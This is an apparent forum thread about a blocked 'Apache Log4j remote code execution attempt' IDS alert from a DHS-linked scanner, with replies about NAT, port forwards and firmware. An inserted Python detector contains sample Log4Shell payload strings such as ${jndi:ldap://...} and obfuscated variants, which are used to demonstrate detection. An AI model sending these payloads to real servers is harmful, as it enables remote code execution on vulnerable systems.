IDS Log Entry
I continue to get this IDS firewall log entry:
vulnscan10.cyhy.ncats.cyber.dhs.gov
IP/port:100.27.42.250:48534
With event: Apache Log4j logging remote code execution attempt
The event is blocked.
It is directed to a SINGLE internal server NOT open to the internet. It appears to be a valid website. My concerns are:
1) How does this website even know about this particular server? ...it's rhetorical.
2) Why is it trying to run code on it? Again, rhetorical.
I am just at a loss on this. Server scanned, all clean. It is a new server that was added in the last year, new OS.
I cannot find anything in the event log on this server that coincides with this or would give any hint as to why something on the outside is trying to get to it.
Thank you all in advance!
Anyone else seeing this?
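The alert named in the post ("Apache Log4j logging remote code execution attempt") is the class of IDS signature that fires on Log4Shell-style `${jndi:...}` lookup strings carried in HTTP request lines, headers or the User-Agent. As an added example, not part of the original post or of any vendor's IDS code, the script below shows what such a signature has to do to be useful: undo Log4j 2's nested-lookup obfuscation (`${lower:j}`, `${::-j}` and similar) before matching, then report the source IP and the JNDI protocol per hit. The log lines are constructed for the example; the IPs and paths are placeholders, not data from the thread.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from the original post).
# Lines 1-3 carry CVE-2021-44228 probe shapes (plain, in the query string,
# and obfuscated with nested lookups); line 4 is an ordinary request.
SAMPLE_LINES = [
    '100.27.42.250 - - [10/Jan/2023:09:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '100.27.42.250 - - [10/Jan/2023:09:12:02 +0000] '
    '"GET /?x=${jndi:rmi://198.51.100.7:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.81"',
    '100.27.42.250 - - [10/Jan/2023:09:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7/x}"',
    '192.0.2.5 - - [10/Jan/2023:09:13:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# Log4j 2 evaluates inner lookups first: ${lower:J} -> "j", ${upper:n} -> "N",
# ${env:NOPE:-j} -> "j" (the ":-" default), ${::-j} -> "j". Scanners use these
# to defeat naive string matching, so the detector resolves them first.
_NAMED_LOOKUP = re.compile(r'\$\{(lower|upper|env|sys|date|java)(?::([^${}]*))?\}', re.IGNORECASE)
_DEFAULT_ONLY = re.compile(r'\$\{:*-([^${}]*)\}')


def _resolve_named(m: "re.Match") -> str:
    kind = m.group(1).lower()
    arg = m.group(2) or ''
    if kind == 'lower':
        return arg.lower()
    if kind == 'upper':
        return arg.upper()
    # env/sys/date/java: an attacker cannot rely on the value, so the payload
    # is carried in the ":-default" part; anything else resolves to nothing.
    if ':-' in arg:
        return arg.split(':-', 1)[1]
    return ''


def normalize(s: str, max_rounds: int = 8) -> str:
    """Collapse nested Log4j lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _DEFAULT_ONLY.sub(lambda m: m.group(1), s)
        new = _NAMED_LOOKUP.sub(_resolve_named, new)
        if new == s:
            break
        s = new
    return s


# Protocols JNDI can be pointed at; ldap/rmi are the ones seen in the wild.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:', re.IGNORECASE)


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI protocol used in a line, or None if the line is clean."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (source_ip, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        proto = find_jndi(line)
        if proto:
            # Combined-log format: the client IP is the first field.
            hits.append((line.split(' ', 1)[0], proto))
    return hits


if __name__ == '__main__':
    for src, proto in scan(SAMPLE_LINES):
        print(f'{src} -> jndi:{proto}')
```

Run it against the web server's own access log (`scan(open(path).read().splitlines())`) to see whether the probe ever reached the application; if the IDS blocked the request at the edge, as the thread reports, there will be no matching line on the server, which is consistent with the poster finding nothing in its event log.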
The IDS log indicates: The event is (was) blocked.
I agree and am happy it was blocked. I am puzzled as to how this outside website even knows about this server, as it is totally cut off from the outside world. A little wary it's from DHS.gov.....lol
Thank you RWelch, appreciate it!
Are you sure you don't have NAT or a port forward configured?
Have you got NO-NAT enabled?
We do have some port forwards for several servers, but nothing forwarded to this server. We run some client VPN connections; NO-NAT is not enabled. No local users have rights to this server. Just very odd that the IP/FQDN of this IDS alert resolves to dhs.gov on AWS. These events were just Monday and yesterday. Nothing today. I did upgrade firmware to 211.4 last night, which may have fixed that issue but not our speed issue. Our internet speeds are still very low coming through our MX250. I might open a ticket today. We have gig/gig fiber. Before the new firmware we were getting 900/200. Today I am getting 500/200. Not good.
